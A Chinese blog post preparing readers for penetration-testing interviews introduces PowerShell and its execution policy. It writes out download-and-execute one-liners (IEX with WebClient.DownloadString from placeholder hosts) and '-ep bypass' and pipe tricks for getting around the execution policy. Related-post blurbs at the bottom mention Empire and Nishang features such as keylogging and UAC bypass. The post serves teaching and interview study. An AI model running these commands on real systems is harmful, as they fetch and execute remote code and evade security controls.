渗透面试常问——Powershell简单了解

已于 2024-11-18 20:50:56 修改
阅读量653 收藏 15
点赞数 9
文章标签: linux windows 网络安全 web安全
于 2024-11-15 18:39:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79457955/article/details/143804938
版权

一、什么是Powershell?

Powershell是微软开发的命令行shell和脚本语言,它基于.Net框架,专门为--系统管理--和配置任务设计。Powershell引入了传统的命令行功能并添加了cmdlet增强--系统管理--能力。

二、如何打开Powershell?

1.在cmd命令行里输入Powershell

2.win+s搜索栏里查找Powershell

三、Powershell与CMD的区别?

四、Powershell的使用?

Powershell本地执行脚本:powershell -f test.ps1 或 powershell -ep bypass -f test.ps1

Powershell加载远程执行脚本(重点):

powershell -c "Invoke-Expression(New-Object System.Net.WebClient).DownloadString('http://example.com/abc')"

powershell -c "(New-Object System.Net.WebClient).DownloadString('http://example.com/abc') | Invoke-Expression"

注:

-c:(Command)在powershell中执行命令

Invoke-Expression :IEX用来把字符串当作命令行执行

WebClinet类(System.Net):提供用于将数据发送到URL标识对的资源以及从这样的资源接收数据的常用方法。

WebClinet.DownloadString方法:以String形式下载请求的资源。可以包含URL的string或URL的形式指定要下载的资源。

**上面这串命令行可以理解为以string的形式远程下载脚本文件,创建一个新的对象加载到本地内存执行。

五、什么是Powershell脚本执行策略?

Powershell的安全特性用于确定在系统上执行哪些策略

默认情况下不允许我们执行或运行脚本,所以前面的 powershell -ep bypass -f test.ps1要加一个-ep bypass 。ep想到于ExecutionPolicy。

查看当前执行策略:Get-ExecutionPolicy

将执行策略设置为Bypass: Set-ExecutionPolicy Bypass

默认情况下执行策略是Restricted

六、如何绕过执行策略

powershell get-content a.ps1 | powershell -noprofile - #本地读取然后通过管道符运行

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx/a.ps1')" #远程下载并通过IEX执行脚本

powershell -ep bypass -File ./a.ps1  #bypass绕过

关于Powershell的命令使用方法这里就不说了,太多了自行百度。上面的内容面试中给容易问到

kuki爱跑酷
关注
PowerShell渗透--Empire
weixin_41082546的博客
10-25 587
0x00 简介 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpre...
PowerShell渗透--Empire(二)
代码小牛的博客
10-25 229
权限提升 Bypass UAC usemodule powershell/privesc/bypassuac 设置listener execute list查看 usemodule powershell/private/bypassuac_wscript (win7) 当运行完提权模块后,back返回agents查看,多了一个提权成功带(*)号的agents usemodule po...
Windows 终端命令详解:PowerShell 初学者指南
最新发布
大数据领域创作新星
04-14 5005
Windows 终端是一个命令行工具,允许用户通过文本命令与系统交互,执行文件管理、系统配置和网络诊断等操作。PowerShellWindows 终端的现代版本,相比传统的命令提示符(CMD),它功能更强大,支持脚本编写和复杂任务处理。本文将以 PowerShell 为主,带你从零开始学习。
PowerShell渗透--Empire+Nishang(WEB安全攻防)
小英雄颂人头
03-04 1104
0xx1 empire Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Mete...
Powershell攻击指南2——Empire
willow_liang的博客
12-05 1359
目录 Empire 1.介绍 2.安装 3.使用监听 4.生成木马 4.1 DLL木马 4.2 launcher 4.3 launcher_vbs木马 4.4 launcher_bat木马 4.5 Macro木马 4.6Ducky 连接主机及基本使用 1.查看已经连接的主机 2.interact命令连接主机 信息收集 Empire 1.介绍 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成.
渗透利器之Powershell
Net的博客
10-25 2217
Powershell是Microsoft Windows命令行shell程序和脚本环境,它提供了令人难以置信的灵活性和功能来管理Windows系统,现在Windows系统上基本上都有它的存在。正因为它的强大,才能被我们所利用,帮助我们进行渗透测试。
20年时候收集的一些信息安全面试
课嗨教育的专栏
05-02 8154
目录 面试面试面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-优快云博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
网安面试百题斩(都是常问!!!)
zzf011900的博客
01-14 1180
原理:在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判。微简单,如果源码会将输入的值进行反序列化,那我们就需要提前将数据序列化。拿支付漏洞来说,简单思路有价格修改,支付状态修改,数量最大值溢出,订单。没有回显的情况下,一般编写脚本,进行自动化注入。但与此同时,由于防火墙。运行时栈,从而改变程序正常流向,轻则导致程序崩溃,重则系统特权被窃取。检查系统日志,检查系统用户,查看是否有异常的系统用户,检查异常进程,检。查隐藏进程,检查异常系统文件,检查系统文件完整性,检查网络,检查系统计。
利用powershell脚本进行内网渗透
h1825819493的博客
06-09 403
ps1是powershell脚本的拓展名,就相当于cmd的.bat脚本,但是他更加强大。
powershell渗透基础
qq_46804551的博客
04-30 1376
一旦攻击者可以在一台计算机上运行代码,就会下载powershell脚本文件(.ps1)到磁盘中 执行,甚至无需写到磁盘中执行,它可以直接在内存中运行,利用诸多特点攻击者可以持续攻击而不被轻易发现。 常用的powershell攻击工具有以下几种: powerSploit: 常用于信息探测,权限提升,凭证窃取,持久化等操作 Nishang: 基于powershell渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本 Empire: 基于powe
渗透中的Powershell简单使用
03-28
powershell简单使用。 一些脚本的开发 ,主要用于渗透
powershell_interview_prep:使用PowerShell解决的样本面试问题
03-25
powershell_interview_prep:使用PowerShell解决的样本面试问题
PowerShell
09-06
Windows Server 2008 x64 Edition 的 Windows PowerShell 2.0 和 WinRM 2.0 (KB968930
Windows Powershell
06-21
Windows Powershell 2.0,相当于批处理的加强版本,功能超级强大。
我眼中的基于powershell渗透测试工具nishang
ovowovo的博客
11-29 323
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 Nishang是一款针对PowerShell渗透工具。 先到github上去下载nishang,并解压 目标机下载nishang 地址:https://github.com/samratashok/nishang 攻击机下载icmpsh 地址:git clone https:...
PowerShell简介 及 渗透工具
prettyX的博客
12-31 621
0X00 内容 常见的PowerShell渗透工具 PowerShell简介 0X01 常见的PowerShell渗透工具 PowerSploit:这是众多PowerShell工具中被广泛使用的PowerShell后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。 Nishang:基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包含...
PowerShell渗透工具Nishang的用法
谢公子的博客
01-14 3225
目录 Nishang Nishang的目录结构 Nishang的使用 Invoke-Decode.ps1 Nishang Nishang是一个PowerShell脚本和有效载荷的框架和集合,它使PowerShell能够用于攻击安全性、渗透测试和红队。它是基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包括下载和执行、键盘记录、DNS、延时命令等脚本...
powershell渗透测试应该这么玩
focus on security
06-15 911
前言 Powershell 是 Microsoft Windows 命令行 shell 程序和脚本环境,它提供了令人难以置信的灵 活性和功能来管理 Windows 系统,现在 Windows 系统上基本上都有它的存在。正因为它的强大,才 能被我们所利用,帮助我们进行渗透测试。 Powershell 的优秀之处 1. 代码运行在内存中可以不去接触磁盘 2. 从另一个系统中下载代码并执行 3. 很多安全产品并不能监测到 powershell 的活动 4. cmd.exe 通常被阻止运行,但是 powershe
PowerOPS:简化渗透测试的便携式PowerShell Runspace工具
资源摘要信息:"PowerOPS是一款使用C#编写的PowerShell便携式后期开发工具,旨在简化使用PowerShell进行渗透测试的过程。该工具不依赖于传统的powershell.exe,而是在PowerShell运行空间环境(.NET)中运行PowerShell...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值